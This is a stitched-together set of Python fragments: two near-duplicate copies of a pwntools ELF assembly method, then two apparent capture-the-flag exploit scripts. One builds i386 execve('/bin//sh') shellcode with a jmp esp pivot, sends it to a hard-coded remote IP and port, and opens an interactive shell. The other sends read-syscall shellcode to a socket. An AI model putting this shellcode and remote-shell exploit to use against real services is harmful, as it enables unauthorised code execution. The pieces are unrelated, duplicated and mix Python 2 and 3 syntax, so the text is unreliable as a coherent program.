def asm(self, address, assembly):
"""Assembles the specified instructions and inserts them
into the ELF at the specified address.
The resulting binary can be saved with ELF.save()
"""
binary = asm(assembly, vma=address)
self.write(address, binary)
def asm(self, address, assembly):
"""asm(address, assembly)
Assembles the specified instructions and inserts them
into the ELF at the specified address.
This modifies the ELF in-pace.
The resulting binary can be saved with :meth:`.ELF.save`
"""
binary = asm(assembly, vma=address)
self.write(address, binary)
# pop rax # 1 byte
# cdq # 1 byte
# sub esp, 0x16 # 3 bytes <-- 0x16 because 18 bytes + 4 bytes (ret override) = 22 bytes
# jmp esp # 2 bytes
from pwnlib.asm import *
from pwn import *
payload_part_1 = [
'push 0x0b', 'pop eax', 'push ecx', 'push 0x68732f2f', 'push 0x6e69622f',
'mov ebx, esp', 'int 0x80'
]
payload_part_2 = ['xor ecx, ecx', 'xor edx, edx', 'sub esp, 0x16', 'jmp esp']
# trying with strings
# \x31\xC9\x31\xD2\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\xCD\x08\x6A\x0B\x58\x99\x83\xEC\x16\xFF\xE4
hexload1 = b''.join([asm(i, arch='i386') for i in payload_part_1])
hexload2 = b''.join([asm(i, arch='i386') for i in payload_part_2])
payload = hexload1 + p32(0x0804919f) + hexload2
print(payload, len(payload))
HOST = '167.71.143.20'
PORT = 31501
p = remote(HOST, PORT)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
with open('payload.hex', 'wb') as f:
f.write(payload)
from pwn import *
from pwnlib.asm import *
LOCAL = ('localhost', 40002)
LOCAL = (sys.argv[1], 40002)
# LOCAL = ('128.199.133.96',31331)
BUFFER = 4096
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(LOCAL)
x = asm("""
mov ax,0x3
push eax
pop ebx
sub cx,128
push ecx
pop edx
int 0x80
ret
""")
print len(x), x.encode('hex')
raw_input("?")
s.send(x)
print s.recv(BUFFER)
print s.recv(BUFFER)
print s.recv(BUFFER)
s.close()